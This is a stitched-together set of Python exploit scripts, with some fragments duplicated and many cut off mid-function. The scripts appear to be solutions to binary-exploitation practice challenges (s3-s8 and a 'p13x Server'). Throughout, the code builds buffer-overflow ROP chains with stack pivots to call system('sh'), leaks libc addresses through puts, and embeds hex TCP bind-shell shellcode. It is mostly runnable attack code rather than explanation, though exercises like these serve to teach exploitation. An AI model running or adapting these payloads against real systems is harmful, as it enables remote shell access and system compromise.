payload += struct.pack('L', base - 0x40) payload += struct.pack('L', 0x400630) # read to pivot target.sendbin(payload) target.sendeof() target.tryexpect("If you're cool you'll get a shell.\n") payload = b'S' * 0x20 payload += struct.pack('L', base) payload += struct.pack('L', 0x400630) # read to get control back target.sendbin(payload) target.sendeof() target.tryexpect("If you're cool you'll get a shell.\n") if __name__ == "__main__": setup = binexpect.setup('./s7') target = setup.target() target.setecho(False) # STAGE 1 payload = b'A' * 0x20 payload += struct.pack('L', base - 0x40) # new stack frame payload += struct.pack('L', 0x400630) # read # pivot through main's leave; ret target.tryexpect("What is your password\?\n") target.sendbin(payload) target.sendeof() target.tryexpect("If you're cool you'll get a shell.\n") payload = b'B' * 0x20 payload += struct.pack('L', base) # value for rbp
clear_line("[x] Testing single bytes in context.\n") for x in range(256): do_test(target, (61, x, 61)) clear_line("[x] Testing multiple bytes in context.\n") for x in range(256): for y in range(256): do_test(target, (61, x, y, 61)) clear_line() if __name__ == '__main__': import binexpect setup = binexpect.setup("cat") target = setup.target() target.setecho(False) try: os.system('setterm -cursor off') run_tests(target) finally: os.system('setterm -cursor on') print("[-] Tests done.")
import binascii import time import sys import json import binexpect def rop(*args): return struct.pack('Q'*len(args), *args) target_host = "localhost" #"attack.samsclass.info" # target_port = "10100" #"13010" # setup = binexpect.setup("nc "+ target_host + " " + target_port) s7 = setup.target() s7.setecho(False) s7.tryexpect("Welcome to the p13x Server! buffer = (.*)\nEnter string \(q to quit\)") buf_addr = int(str(s7.match.group(1), 'utf-8'), 16) print ("BUF ADDR: " + hex(buf_addr)) def get_shellcode(port): # simple tcp bind shell, ripped from: http://shell-storm.org/shellcode/files/shellcode-858.php hexcode = "6a025f6a015e6a065a6a29580f054989c04d31d241524152c604240266c7442402PORT4889e641505f6a105a6a31580f0541505f6a015e6a32580f054889e66a104889e241505f6a2b580f054889c76a035e48ffce6a21580f0575f64831f64831d248bf2f2f62696e2f736848c1ef0857545f6a3b580f05" # render the port to BIG endian hexport = str(binascii.hexlify(bytearray([ (port >> 8) & 0xff, port & 0xff])), 'utf-8')
import struct import binascii import time import sys import json import binexpect def rop(*args): return struct.pack('Q' * len(args), *args) target_host = "localhost" #"attack.samsclass.info" # target_port = "10100" #"13010" # setup = binexpect.setup("nc " + target_host + " " + target_port) s7 = setup.target() s7.setecho(False) s7.tryexpect( "Welcome to the p13x Server! buffer = (.*)\nEnter string \(q to quit\)") buf_addr = int(str(s7.match.group(1), 'utf-8'), 16) print("BUF ADDR: " + hex(buf_addr)) def get_shellcode(port): # simple tcp bind shell, ripped from: http://shell-storm.org/shellcode/files/shellcode-858.php hexcode = "6a025f6a015e6a065a6a29580f054989c04d31d241524152c604240266c7442402PORT4889e641505f6a105a6a31580f0541505f6a015e6a32580f054889e66a104889e241505f6a2b580f054889c76a035e48ffce6a21580f0575f64831f64831d248bf2f2f62696e2f736848c1ef0857545f6a3b580f05" # render the port to BIG endian
#!/usr/bin/env python import binexpect import struct if __name__ == "__main__": setup = binexpect.setup('./s3') target = setup.target() target.setecho(False) stage1 = b'sh'.ljust(8, b'\x00') target.tryexpect('What is your name?') target.sendbinline(stage1) payload = b'A' * 0x30 payload += b'paddingp' #rbp payload += struct.pack('L', 0x4007e3) # pop rdi; ret payload += struct.pack('L', 0x6010a0) # pop'd payload += struct.pack('L', 0x400772) # system() target.tryexpect('What is your password?') target.sendbinline(payload) target.tryexpect("If you're cool you'll get a shell.") target.pwned()
#!/usr/bin/env python import binexpect import struct if __name__ == "__main__": setup = binexpect.setup('./s4') target = setup.target() target.setecho(False) # setting future stack on the bss stage1 = b'A' * 0x3d8 # padding stage1 += struct.pack('L', 0x4007e3) # pop rdi; ret stage1 += struct.pack('L', 0x601490) # pop'd stage1 += struct.pack('L', 0x400772) # system stage1 += b'sh'.ljust(8, b'\x00') # "sh" target.tryexpect('What is your name?') target.sendbinline(stage1) # trigger stack pivot payload = b'A' * 0x30 payload += struct.pack('L', 0x601470) # bss + 0x3d8 bytes payload += struct.pack('L', 0x40077c) # leave; ret (pivot) target.tryexpect('What is your password?') target.sendbinline(payload) target.tryexpect("If you're cool you'll get a shell.") target.pwned()
#!/usr/bin/env python # -*- coding: utf-8 -*- import binexpect import struct if __name__ == "__main__": setup = binexpect.setup('./s5') target = setup.target() target.setecho(False) base = 0x601500 # new stack base payload = b'A' * 32 payload += struct.pack('L', base) # new stack base payload += struct.pack('L', 0x400670) # read(0, rbp-0x20, 0x400); [...];leave; ret # pivot here from main target.tryexpect('What is your password?') target.sendbinline(payload) payload = b'A' * 32 payload += b'BBBBBBBB' # rbp payload += struct.pack('L', 0x400743) # pop rdi; ret payload += struct.pack('L', base+0x20) # @'sh' payload += struct.pack('L', 0x4006c7) # system() payload += b'sh'.ljust(8, b'\x00') # 'sh' target.sendbinline(payload) target.tryexpect("If you're cool you'll get a shell.")
import binexpect import struct # 0x4006d1 : leave; ret # 0x400743 : pop rdi; ret # 0x400670 : read(0, rbp-0x20, 0x400); [...];leave; ret # 0x400686 : read(); [...]; leave; ret # 0x4006c7 : system() # 0x600ff8 : .got /!\ # 0x601000 : .got.plt /!\ # 0x601050 : .data # 0x601060 : .bss if __name__ == "__main__": setup = binexpect.setup('./s6') target = setup.target() target.setecho(False) base = 0x601520 # stack # STAGE1: # pivot stack with call to read payload = b'A' * 0x20 payload += struct.pack('L', base - 0x30) # new stack base payload += struct.pack('L', 0x400670) # read(0, rbp-0x20, 0x30); [...];leave; ret # pivot here from main. target.tryexpect('What is your password?') target.sendbin(payload) # STAGE2:
def get(self, symbol): if symbol in self.libc_map: return self.libc_map[symbol] return None def rop(*args): return struct.pack('Q'*len(args), *args) libc_map = LibcMap() setup = binexpect.setup("./s7") s7 = setup.target() s7.setecho(False) s7.tryexpect("Welcome Stranger") s7.tryexpect("What is your password?") def leak(address): payload = bytes('A' * 32, 'utf-8') payload += rop( 0x42424242, # frame pointer 0x00400703, # pop rdi; ret; address, # leak 0x004004c0, # puts@plt
do_test(target, (x,)) clear_line("[x] Testing single bytes in context.\n") for x in range(256): do_test(target, (61, x, 61)) clear_line("[x] Testing multiple bytes in context.\n") for x in range(256): for y in range(256): do_test(target, (61, x, y, 61)) clear_line() if __name__ == '__main__': import binexpect setup = binexpect.setup("cat") target = setup.target() target.setecho(False) try: os.system('setterm -cursor off') run_tests(target) finally: os.system('setterm -cursor on') print("[-] Tests done.")
def get(self, symbol): if symbol in self.libc_map: return self.libc_map[symbol] return None def rop(*args): return struct.pack('Q'*len(args), *args) libc_map = LibcMap() setup = binexpect.setup("./s8") s8 = setup.target() s8.setecho(False) s8.tryexpect("Welcome Stranger") s8.tryexpect("What is your password\?") def leak(address): payload = bytes('A' * 32, 'utf-8') payload += rop( 0x00601800, # frame pointer 0x00400630, # read@main ) s8.sendbin(payload)